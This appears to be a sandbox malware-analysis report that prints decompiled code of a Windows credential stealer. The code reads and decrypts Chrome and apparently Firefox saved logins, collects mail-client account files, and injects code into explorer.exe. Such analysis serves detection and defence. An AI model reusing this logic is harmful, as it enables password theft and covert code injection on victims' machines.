                                      				_t36 = FindFirstFileA( &_v1120,  &_v592);
                                      				if(_t36 != 0xffffffff) {
                                      					do {
                                      						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
                                      							PathCombineA( &_v272, 0x446698,  &(_v592.cFileName));
                                      							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
                                      							E0043878B(_t31,  &_v272);
                                      						}
                                      					} while (FindNextFileA(_t36,  &_v592) != 0);
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • GetFullPathNameA.KERNEL32(00446698,00000104,?,00000000), ref: 00438ABD
                                      • PathCombineA.SHLWAPI(?,?,00443510), ref: 00438ADC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00438AEC
                                      • PathCombineA.SHLWAPI(?,00446698,0000002E), ref: 00438B23
                                      • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 00438B32
                                        • Part of subcall function 0043878B: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004387A8
                                        • Part of subcall function 0043878B: GetLastError.KERNEL32 ref: 004387B5
                                        • Part of subcall function 0043878B: CloseHandle.KERNEL32(00000000), ref: 004387BC
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00438B4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                      • String ID: .$Accounts\Account.rec0
                                      • API String ID: 3873318193-2526347284
                                      • Opcode ID: 779dad72e6231444c9569a291b1b17fa54f0aef0765d1345e780e9135fcf9713
                                      • Instruction ID: f000e80871f9eee1791a6363615349a565a630d05a7d1011d1d22a94db022bdd
                                      • Opcode Fuzzy Hash: 779dad72e6231444c9569a291b1b17fa54f0aef0765d1345e780e9135fcf9713
                                      • Instruction Fuzzy Hash: A81189B190021C6BDB20DBA4DC89EEEB77CDB45714F5004A7B609D3181D678AF888F54
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 100%
                                      			E0043FD9E(long __edx) {
                                      				void* _v8;
                                      				long _v12;
                                      				char _v268;
                                      				void _v272;
                                      				void* _t25;
                                      				void* _t27;
                                      				void* _t33;
                                      				void* _t37;
                                      
                                      				_t33 = OpenProcess(0x1fffff, 0, __edx);
                                      				_v8 = _t33;
                                      				_v272 = GetCurrentProcessId();
                                      				_t35 = E004310AD(0xff);
                                      				GetModuleFileNameA(0, _t13, 0xff);
                                      				E00431114( &_v268, _t35);
                                      				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
                                      				WriteProcessMemory(_t33, _t27, 0x446150, 0x800, 0);
                                      				VirtualProtectEx(_v8, _t27, 0x800, 0x40,  &_v12);
                                      				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
                                      				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
                                      				_t9 = _t27 + 0x10e; // 0x10e
                                      				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
                                      				 *0x44679c = _t25;
                                      				return _t25;
                                      			}

                                      APIs
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,00000000), ref: 0043FDB2
                                      • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0043FDBD
                                        • Part of subcall function 004310AD: GetProcessHeap.KERNEL32(00000000,00000000,0043F750,00000800,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 004310B3
                                        • Part of subcall function 004310AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 004310BA
                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF,?,?,00000000), ref: 0043FDDB
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040,?,?,00000000), ref: 0043FE05
                                      • WriteProcessMemory.KERNEL32(00000000,00000000,00446150,00000800,00000000,?,?,00000000), ref: 0043FE1D
                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000800,00000040,?,?,?,00000000), ref: 0043FE2E
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000103,00003000,00000004,?,?,00000000), ref: 0043FE45
                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000103,00000000,?,?,00000000), ref: 0043FE5B
                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0043FE6E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocVirtual$HeapMemoryWrite$CreateCurrentFileModuleNameOpenProtectRemoteThread
                                      • String ID:
                                      • API String ID: 910334972-0
                                      • Opcode ID: 9e01070dc42aa24a31b8a9f0b3759439ae7c270be827b80846d18e49f942c06c
                                      • Instruction ID: 70c266dc8be2bfae17259e781995ea1b5f97dc5b5b5658e49603fa4c9ed2a209
                                      • Opcode Fuzzy Hash: 9e01070dc42aa24a31b8a9f0b3759439ae7c270be827b80846d18e49f942c06c
                                      • Instruction Fuzzy Hash: 7A215475640218BEF7245B51DD4BFEB7BACDB45760F200175B704A61D0D6F06D408FA8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 96%
                                      			E0043AFDF(void* __ecx, void* __eflags) {
                                      				char _v8;
                                      				WCHAR* _v12;
                                      				char _v16;
                                      				WCHAR* _v20;
                                      				char _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				char _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v60;
                                      				signed int _v64;
                                      				signed int _v68;
                                      				void* _v72;
                                      				char _v76;
                                      				intOrPtr _v80;
                                      				char _v84;
                                      				intOrPtr _v88;
                                      				char _v92;
                                      				char _v96;
                                      				char _v100;
                                      				intOrPtr* _t127;
                                      				void* _t128;
                                      				signed int _t131;
                                      				void* _t135;
                                      				char _t136;
                                      				signed int _t141;
                                      				signed int _t142;
                                      				signed int _t143;
                                      				signed int _t144;
                                      				char _t171;
                                      				intOrPtr _t172;
                                      				signed int _t175;
                                      				signed int _t191;
                                      				void* _t260;
                                      				void* _t261;
                                      				void* _t262;
                                      				void* _t263;
                                      				signed int _t264;
                                      				void* _t267;
                                      				void* _t268;
                                      				void* _t269;
                                      
                                      				_t269 = __eflags;
                                      				_t263 = __ecx;
                                      				E004331EC( &_v44, "SELECT * FROM logins");
                                      				_t260 = 0x1a;
                                      				E0043D75B( &_v12, _t260, _t269);
                                      				E00433297( &_v12, _t260, _t269, "\\");
                                      				_t261 = 8;
                                      				E00433162( &_v12, _t269, E004332D4( &_v36, _t261, _t269));
                                      				E00435A2D(_v36);
                                      				E00433297( &_v12, _t261, _t269, L".tmp");
                                      				_t262 = 0x1c;
                                      				E0043D75B( &_v20, _t262, _t269);
                                      				E00433297( &_v20, _t262, _t269, L"\\Google\\Chrome\\User Data\\Default\\Login Data");
                                      				if(PathFileExistsW(_v20) == 0 || CopyFileW(_v20, _v12, 0) == 0) {
                                      					L4:
                                      					_t264 = 0;
                                      					goto L5;
                                      				} else {
                                      					E00433264( &_v20,  &_v12);
                                      					_t127 = E00433381( &_v20,  &_v36);
                                      					_t128 =  *((intOrPtr*)(_t263 + 0x2c))( *_t127,  &_v40, 2, 0);
                                      					_t208 = _v36;
                                      					_t268 = _t267 + 0x10;
                                      					E00435A2D(_v36);
                                      					if(_t128 == 0) {
                                      						_t131 =  *((intOrPtr*)(_t263 + 0x38))(_v40, _v44, 0xffffffff,  &_v8, 0);
                                      						_t268 = _t268 + 0x14;
                                      						__eflags = _t131;
                                      						if(_t131 != 0) {
                                      							goto L3;
                                      						}
                                      						_t135 =  *((intOrPtr*)(_t263 + 0x44))(_v8);
                                      						_t264 = 1;
                                      						while(1) {
                                      							__eflags = _t135 - 0x64;
                                      							if(_t135 != 0x64) {
                                      								break;
                                      							}
                                      							_v68 = _v68 & 0x00000000;
                                      							_t191 = 0;
                                      							_v64 = 0;
                                      							_t136 = E004359AA(_t264);
                                      							_v16 = _t136;
                                      							E004331EC( &_v24,  *((intOrPtr*)(_t263 + 0x40))(_v8, 0));
                                      							E004331EC( &_v60,  *((intOrPtr*)(_t263 + 0x40))(_v8, _t264));
                                      							_t141 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 3);
                                      							__eflags = _t141;
                                      							if(_t141 > 0) {
                                      								E00432F52( &_v16, E004331EC( &_v48,  *((intOrPtr*)(_t263 + 0x40))(_v8, 3)));
                                      								E00435A2D(_v48);
                                      							}
                                      							_t142 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 3);
                                      							__eflags = _t142;
                                      							if(_t142 > 0) {
                                      								E00432F52( &_v16, E004331EC( &_v52,  *((intOrPtr*)(_t263 + 0x40))(_v8, 3)));
                                      								E00435A2D(_v52);
                                      							}
                                      							_t143 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 5);
                                      							__eflags = _t143;
                                      							if(_t143 > 0) {
                                      								_t171 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 5);
                                      								_v84 = _t171;
                                      								_t172 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 5);
                                      								_t268 = _t268 + 0x10;
                                      								_v80 = _t172;
                                      								_t175 =  &_v84;
                                      								__imp__CryptUnprotectData(_t175, 0, 0, 0, 0, _t264,  &_v76);
                                      								__eflags = _t175;
                                      								if(_t175 != 0) {
                                      									E00432DC1( &_v68, _v72, _v76);
                                      									LocalFree(_v72);
                                      									_t191 = _v64;
                                      								}
                                      							}
                                      							_t144 = E00432EB9( &_v16);
                                      							__eflags = _t144;
                                      							if(_t144 > 0) {
                                      								L17:
                                      								_v100 = 0;
                                      								_v96 = 0;
                                      								_v92 = 0;
                                      								__eflags = E00432EB9( &_v24);
                                      								if(__eflags > 0) {
                                      									E00433264( &_v100, E00432ECA( &_v24, __eflags,  &_v28));
                                      									E00435A2D(_v28);
                                      									_t78 =  &_v28;
                                      									 *_t78 = _v28 & 0x00000000;
                                      									__eflags =  *_t78;
                                      								}
                                      								__eflags = E00432EB9( &_v16);
                                      								if(__eflags > 0) {
                                      									E00433264( &_v96, E00432ECA( &_v16, __eflags,  &_v32));
                                      									E00435A2D(_v32);
                                      									_t85 =  &_v32;
                                      									 *_t85 = _v32 & 0x00000000;
                                      									__eflags =  *_t85;
                                      								}
                                      								__eflags = _t191;
                                      								if(_t191 != 0) {
                                      									E00433264( &_v92, E00432ECA(E00432D59( &_v68,  &_v56), __eflags,  &_v36));
                                      									E00435A2D(_v36);
                                      									_t93 =  &_v36;
                                      									 *_t93 = _v36 & 0x00000000;
                                      									__eflags =  *_t93;
                                      									E00435A2D(_v56);
                                      								}
                                      								_t268 = _t268 - 0x10;
                                      								_v88 = _t264;
                                      								E00431EB9(_t268,  &_v100);
                                      								E00431EEF(_t263);
                                      								E0043138F( &_v100);
                                      								goto L24;
                                      							} else {
                                      								__eflags = _t191;
                                      								if(_t191 == 0) {
                                      									L24:
                                      									E00435A2D(_v60);
                                      									E00435A2D(_v24);
                                      									E00435A2D(_v16);
                                      									E00432E66( &_v68);
                                      									_t135 =  *((intOrPtr*)(_t263 + 0x44))(_v8);
                                      									continue;
                                      								}
                                      								goto L17;
                                      							}
                                      						}
                                      						 *((intOrPtr*)(_t263 + 0x60))(_v8);
                                      						 *((intOrPtr*)(_t263 + 0x34))();
                                      						E0043345A(_t268,  &_v12);
                                      						E0043DEA9(_v40);
                                      						L5:
                                      						E00435A2D(_v20);
                                      						E00435A2D(_v12);
                                      						E00435A2D(_v44);
                                      						return _t264;
                                      					}
                                      					L3:
                                      					E0043345A(_t268,  &_v12);
                                      					E0043DEA9(_t208);
                                      					goto L4;
                                      				}
			}

			Instruction address column for the function above (one address per listing line, detached from the code by extraction): 0x0043afdf through 0x0043b30c; the API references below (PathFileExistsW at 0043B053, CopyFileW at 0043B065, CryptUnprotectData at 0043B1CF, LocalFree at 0043B1EA) fall inside this range.

                                      APIs
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 004331F5
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433202
                                        • Part of subcall function 004331EC: lstrcpyA.KERNEL32(00000000,?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433215
                                        • Part of subcall function 0043D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0043D78C
                                        • Part of subcall function 00433162: lstrcatW.KERNEL32(00000000,?), ref: 00433192
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0043B053
                                      • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0043B065
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00434AC0,?), ref: 004333AE
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 004333D9
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0043B1CF
                                      • LocalFree.KERNEL32(?,?,?), ref: 0043B1EA
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 0043DEA9: DeleteFileW.KERNEL32(?,?,?,004329BF), ref: 0043DEB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$ByteCharFreeMultiPathWidelstrlen$CopyCryptDataDeleteExistsFolderLocalSpecialUnprotectVirtuallstrcat
                                      • String ID: .tmp$SELECT * FROM logins$\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 1985407002-2809225024
                                      • Opcode ID: 98b6e539f244b108d916ea1b31e25e203f18e9d614f856f58691977bc86e3fde
                                      • Instruction ID: fcef8ca172da253c564e006a8211cc40ad6bb8611a16e2976c011d9aecb7f64a
                                      • Opcode Fuzzy Hash: 98b6e539f244b108d916ea1b31e25e203f18e9d614f856f58691977bc86e3fde
                                      • Instruction Fuzzy Hash: 54A15D71900109ABDF05EFA1DD56AEEBB79FF08305F10112AF112A61A1EF78AA05DB58
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
• Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: d298cc8daf3d2cadf7bab5d5c08e48a398abbc9902adb8634d59988627f28fd6
                                      • Instruction ID: be4eff87c30ab07de11af9fe5f70ce068a32d345da919a5aa93e5eda233a3e86
                                      • Opcode Fuzzy Hash: d298cc8daf3d2cadf7bab5d5c08e48a398abbc9902adb8634d59988627f28fd6
                                      • Instruction Fuzzy Hash: 8EC23B71E046288FDB25CE68DD81BEAB7B5EB49354F1441EED81EE7240E774AE818F40
                                      Uniqueness

                                      Uniqueness Score: 0.12%

                                      C-Code - Quality: 100%
                                      			E0043FE7E(void* __ecx, void* __eflags) {
                                      				char _v264;
                                      				intOrPtr _v292;
                                      				void* _v300;
                                      				int _t11;
                                      				void* _t22;
                                      
				// Returns the PID of explorer.exe by walking a Toolhelp process snapshot; 0 when not found.
				// The right-hand column is the instruction address the decompiler attached to each line.
				_t22 = CreateToolhelp32Snapshot(2, 0);                       // 0x0043fe98  TH32CS_SNAPPROCESS
				E00431052( &_v300, 0, 0x128);                                // 0x0043fea4  memset(&pe, 0, sizeof(PROCESSENTRY32))
				_v300 = 0x128;                                               // 0x0043feac  pe.dwSize = 296, the ANSI PROCESSENTRY32 size
				_t11 = Process32First(_t22,  &_v300);                        // 0x0043feba
				while(_t11 != 0) {                                           // 0x0043fee7
					if(E004310E6( &_v264, "explorer.exe") == 0) {            // 0x0043fed7  _v264 is pe.szExeFile (struct offset 36), ANSI compare
						return _v292;                                        // 0x00000000  _v292 is pe.th32ProcessID (offset 8); the snapshot handle is not closed on this path
					}                                                        // 0x0043fef8
					_t11 = Process32Next(_t22,  &_v300);                     // 0x0043fee1
				}                                                            // 0x0043fee1
				CloseHandle(_t22);                                           // 0x0043feec
				return 0;                                                    // 0x00000000  explorer.exe not found
			}

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0043FE8D
                                      • Process32First.KERNEL32(00000000,?), ref: 0043FEBA
                                      • Process32Next.KERNEL32(00000000,?), ref: 0043FEE1
                                      • CloseHandle.KERNEL32(00000000), ref: 0043FEEC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID: explorer.exe
                                      • API String ID: 420147892-3187896405
                                      • Opcode ID: b6efa8424f0e24ceca2991aa02c1e8b7b678d2db9d4c7f0dd08d980231dc2b07
                                      • Instruction ID: 45dca76c084bc66213b39bbb762243bcdcd602548e03d5f1d291c61269c21bda
                                      • Opcode Fuzzy Hash: b6efa8424f0e24ceca2991aa02c1e8b7b678d2db9d4c7f0dd08d980231dc2b07
                                      • Instruction Fuzzy Hash: 6F01F976A01214ABD7209761EC4AFDA33FCDF4E310F5000B6FA05E2190EB78DE958A6C
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 24%
                                      			E004392D8(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				char _v8216;
                                      				char* _t24;
                                      				signed int _t27;
                                      				WCHAR* _t29;
                                      				intOrPtr _t30;
                                      				signed int* _t31;
                                      				intOrPtr _t32;
                                      				void* _t34;
                                      				intOrPtr _t35;
                                      				intOrPtr _t36;
                                      				void* _t38;
                                      				void* _t39;
                                      
				// DPAPI wrapper: bytes 1.._a4-1 of the buffer at __ecx are copied into a GlobalAlloc'd
				// buffer and handed to CryptUnprotectData; the plaintext (or the literal
				// L"Could not decrypt" on failure) is copied to the WCHAR buffer at __edx with lstrcpyW.
				// Decompiler quality is 24%: the output-pointer increment and the element width in the
				// second loop were not recovered. Right-hand column: instruction address per line.
				_t30 = __ecx;                                                // 0x004392d8
				E00431130(0x2014, __ecx);                                    // 0x004392e0  stack probe for the 0x2014-byte frame
				_t36 = _a4;                                                  // 0x004392e8  _a4 = input length
				_t29 = __edx;                                                // 0x004392eb  output WCHAR buffer
				_v8 = _t30;                                                  // 0x004392ed
				_t3 = _t36 - 1; // -1                                        // 0x004392f0
				_t34 = GlobalAlloc(0x40, _t3);                               // 0x004392fe  GPTR, length - 1: the first input byte is skipped
				_t38 = 1;                                                    // 0x00439300
				if(_t36 > 1) {                                               // 0x00439303
					_t32 = _v8;                                              // 0x00439305
					do {                                                     // 0x00439308
						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));  // 0x0043930b  out[i-1] = in[i]
						_t38 = _t38 + 1;                                     // 0x0043930f
					} while (_t38 < _t36);                                   // 0x00439310
				}                                                            // 0x00439308
				_t8 = _t36 - 1; // -1                                        // 0x00439314
				_v12 = _t34;                                                 // 0x00439317  DATA_BLOB.pbData
				_v16 = _t8;                                                  // 0x0043931a  DATA_BLOB.cbData
				_t39 = 0;                                                    // 0x0043931d
				_t24 =  &_v16;                                               // 0x00439328  pDataIn
				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);      // 0x0043932c  pDataOut = &_v24; the returned buffer is never LocalFree'd here
				if(_t24 == 0) {                                              // 0x00439334  _t24 now holds the BOOL return value (eax)
					_push(L"Could not decrypt");                             // 0x0043935d
				} else {                                                     // 0x00439336
					if(_t36 > 0) {                                           // 0x00439338
						_t35 = _v20;                                         // 0x0043933a  pDataOut->pbData
						_t31 =  &_v8216;                                     // 0x0043933d
						do {                                                 // 0x00439343
							_t27 =  *(_t35 + _t39) & 0x000000ff;             // 0x00439343  every second plaintext byte
							_t39 = _t39 + 2;                                 // 0x00439347  bounded by the input length, not by pDataOut->cbData
							 *_t31 = _t27;                                   // 0x0043934a
							_t31 =  &(_t31[0]);                              // 0x0043934d  pointer increment not recovered by the decompiler
						} while (_t39 < _t36);                               // 0x00439350
					}                                                        // 0x00439343
					_push( &_v8216);                                         // 0x0043935a
				}                                                            // 0x0043935a
				return lstrcpyW(_t29, ??);                                   // 0x0043936d  ?? = whichever source string was pushed above
			}

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,-00000001,75F645FD,?,?,?,0043928C,00001000,?,00000000,00001000), ref: 004392F6
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0043928C), ref: 0043932C
                                      • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00439363
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                      • String ID: Could not decrypt
                                      • API String ID: 3112367126-1484008118
                                      • Opcode ID: fd3e507469d5b0c164968fa78ed29cbab0a2911fbe21c26fb5410def05336900
                                      • Instruction ID: 1efc193751193310c14b7db2d828aeccb0e37247e73c6ca0e05a27b79ae8fe77
                                      • Opcode Fuzzy Hash: fd3e507469d5b0c164968fa78ed29cbab0a2911fbe21c26fb5410def05336900
                                      • Instruction Fuzzy Hash: F01106B69002199BCB11CB99C9809EEF7BCEF4D700F50406AEA55E3251E2759E05CBB4
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00CC6090
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CC609A
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00CC60A7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
• Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 9dafc64c9d518cf01f5c53f23e1f112b6bca64e415103df85e669bd90aeaf2a3
                                      • Instruction ID: c81dcecf5143947f1400616fcc3b2d7638af06999eb793aa72c253663e14fa6e
                                      • Opcode Fuzzy Hash: 9dafc64c9d518cf01f5c53f23e1f112b6bca64e415103df85e669bd90aeaf2a3
                                      • Instruction Fuzzy Hash: 2531D575901218ABCB21DF69D888B8DBBB8BF08310F5041DAE91CA7251E7309F859F45
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      C-Code - Quality: 92%
                                      			E00439E04(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
                                      				int _v8;
                                      				DWORD* _v12;
                                      				DWORD* _v16;
                                      				void* _v20;
                                      				int _v24;
                                      				BYTE* _v28;
                                      				char _v32;
                                      				char _v8128;
                                      				int _t27;
                                      				CHAR* _t39;
                                      				void* _t43;
                                      
				// Base64-decodes _a4 (CRYPT_STRING_BASE64 = 1) into a stack buffer, wraps it as
				// {type = 0, data, len} and calls the function pointer at __ecx+0x70 with that item,
				// an empty output item and a NULL context. The page does not name the target; the
				// item layout and (in, out, ctx) call shape match NSS SECItem / PK11SDR_Decrypt, and
				// the caller context carries "encryptedUsername", a Firefox logins.json field, so this
				// reads as the Firefox credential path (inference, not confirmed by the listing).
				// The NUL-terminated result is copied into a fresh allocation returned through _a8.
				// Right-hand column: instruction address per line.
				_t43 = __ecx;                                                // 0x00439e04
				E00431130(0x1fbc, __ecx);                                    // 0x00439e0c  stack probe
				_v8 = 0x1fa0;                                                // 0x00439e1e  pcbBinary: buffer size in, decoded length out
				_t27 = lstrlenA(_a4);                                        // 0x00439e21
				E00431052( &_v8128, 0, 0x1fa0);                              // 0x00439e34  memset(buf, 0, 0x1fa0)
				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);   // 0x00439e4f  return value is not checked
				_v32 = 0;                                                    // 0x00439e5b  in.type
				_v28 =  &_v8128;                                             // 0x00439e5e  in.data
				_v24 = _v8;                                                  // 0x00439e64  in.len = decoded length
				_v16 = 0;                                                    // 0x00439e6f  out.data
				_v12 = 0;                                                    // 0x00439e73  out.len
